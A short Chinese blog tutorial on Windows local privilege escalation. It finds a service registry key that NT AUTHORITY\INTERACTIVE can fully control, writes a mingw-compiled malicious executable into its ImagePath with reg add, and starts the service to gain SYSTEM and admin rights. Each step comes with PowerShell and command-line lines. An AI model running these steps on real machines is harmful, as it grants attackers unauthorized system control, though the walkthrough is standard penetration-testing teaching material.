注册表提权原理:
将一个伪造的服务,通过注册表写入,在开启这个服务,那么伪造的服务就会运行我们的恶意代码(服务是以system权限运行的)
NT AUTHORITY\INTERACTIVE 当前用户的权限,利用他可以完全控制注册表的权限提权(如果配置不当)
powershell
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString |Format-List > 1.txt
在1.txt中查找"NT AUTHORITY\INTERACTIVE",直到找到一个Allow FullControl
powershellGet-Acl -Path hklm:\System\CurrentControlSet\services\a | fl (a为NT AUTHORITY\INTERACTIVE用户Allow FullControl的服务)
把windows_service.c在kali中编译成exe文件
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
然后放到temp目录下,然后把提升权限的exe路径添加到查出来的服务
reg add HKLM\SYSTEM|CurrentControlSet\services\a /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
添加成功后,运行伪造好的服务:
sc start a
net user 查看已经是admin用户组了
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构